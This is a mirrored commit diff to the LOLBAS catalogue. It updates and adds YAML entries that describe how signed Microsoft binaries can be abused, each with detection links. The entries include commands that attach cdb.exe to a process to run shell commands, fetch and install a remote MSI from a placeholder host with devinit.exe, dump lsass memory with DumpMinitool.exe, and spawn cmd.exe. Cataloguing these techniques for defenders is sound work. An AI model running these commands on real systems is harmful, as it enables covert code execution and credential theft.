mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
			
		
		
		
	Several LOLBINs additions & modifications (#192)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
		| @@ -41,7 +41,7 @@ Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml | ||||
|   - IOC: As a Windows SDK binary, execution on a system may be suspicious | ||||
| Resources: | ||||
|   - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ | ||||
|   - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/ | ||||
|   - Link: https://twitter.com/nas_bench/status/1534916659676422152 | ||||
|   - Link: https://twitter.com/nas_bench/status/1534915321856917506 | ||||
| Acknowledgement: | ||||
|   | ||||
| @@ -1,7 +1,7 @@ | ||||
| --- | ||||
| Name: Cdb.exe | ||||
| Description: Debugging tool included with Windows Debugging Tools. | ||||
| Author: 'Oddvar Moe' | ||||
| Author: Oddvar Moe | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe | ||||
| @@ -12,8 +12,8 @@ Commands: | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: | | ||||
|      cdb.exe -pd -pn <process_name> | ||||
|      .shell <cmd> | ||||
|       cdb.exe -pd -pn <process_name> | ||||
|       .shell <cmd> | ||||
|     Description: Attaching to any process and executing shell commands. | ||||
|     Usecase: Run a shell command under a trusted Microsoft signed binary | ||||
|     Category: Execute | ||||
| @@ -41,7 +41,7 @@ Resources: | ||||
|   - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | ||||
|   - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options | ||||
|   - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda | ||||
|   - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ | ||||
|   - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/ | ||||
|   - Link: https://twitter.com/nas_bench/status/1534957360032120833 | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|   | ||||
| @@ -1,8 +1,8 @@ | ||||
| --- | ||||
| Name: Createdump.exe | ||||
| Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core) | ||||
| Author: Daniel Santos | ||||
| Created: 2022-08-05 | ||||
| Author: mr.d0x, Daniel Santos | ||||
| Created: 2022-01-20 | ||||
| Commands: | ||||
|   - Command: createdump.exe -n -f dump.dmp [PID] | ||||
|     Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process. | ||||
| @@ -13,6 +13,9 @@ Commands: | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe | ||||
|   - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe | ||||
|   - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe | ||||
|   - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml | ||||
|   | ||||
							
								
								
									
										21
									
								
								yml/OtherMSBinaries/Devinit.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								yml/OtherMSBinaries/Devinit.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Devinit.exe | ||||
| Description: Visual Studio 2019 tool | ||||
| Author: mr.d0x | ||||
| Created: 2022-01-20 | ||||
| Commands: | ||||
|   - Command: devinit.exe run -t msi-install -i https://example.com/out.msi | ||||
|     Description: Downloads an MSI file to C:\Windows\Installer and then installs it. | ||||
|     Usecase: Executes code from a (remote) MSI file. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe | ||||
|   - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe | ||||
| Resources: | ||||
|   - Link: https://twitter.com/mrd0x/status/1460815932402679809 | ||||
| Acknowledgement: | ||||
|   - Person: mr.d0x | ||||
|     Handle: '@mrd0x' | ||||
							
								
								
									
										20
									
								
								yml/OtherMSBinaries/DumpMinitool.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								yml/OtherMSBinaries/DumpMinitool.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| --- | ||||
| Name: DumpMinitool.exe | ||||
| Description: Dump tool part Visual Studio 2022 | ||||
| Author: mr.d0x | ||||
| Created: 2022-01-20 | ||||
| Commands: | ||||
|   - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full | ||||
|     Description: Creates a memory dump of the lsass process | ||||
|     Usecase: Create memory dump and parse it offline | ||||
|     Category: Dump | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1003.001 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions | ||||
| Resources: | ||||
|   - Link: https://twitter.com/mrd0x/status/1511415432888131586 | ||||
| Acknowledgement: | ||||
|   - Person: mr.d0x | ||||
|     Handle: '@mrd0x' | ||||
							
								
								
									
										21
									
								
								yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Microsoft.NodejsTools.PressAnyKey.exe | ||||
| Description: Part of the NodeJS Visual Studio tools. | ||||
| Author: mr.d0x | ||||
| Created: 2022-01-20 | ||||
| Commands: | ||||
|   - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe | ||||
|     Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. | ||||
|     Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe | ||||
|   - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe | ||||
| Resources: | ||||
|   - Link: https://twitter.com/mrd0x/status/1463526834918854661 | ||||
| Acknowledgement: | ||||
|   - Person: mr.d0x | ||||
|     Handle: '@mrd0x' | ||||
		Reference in New Issue
	
	Block a user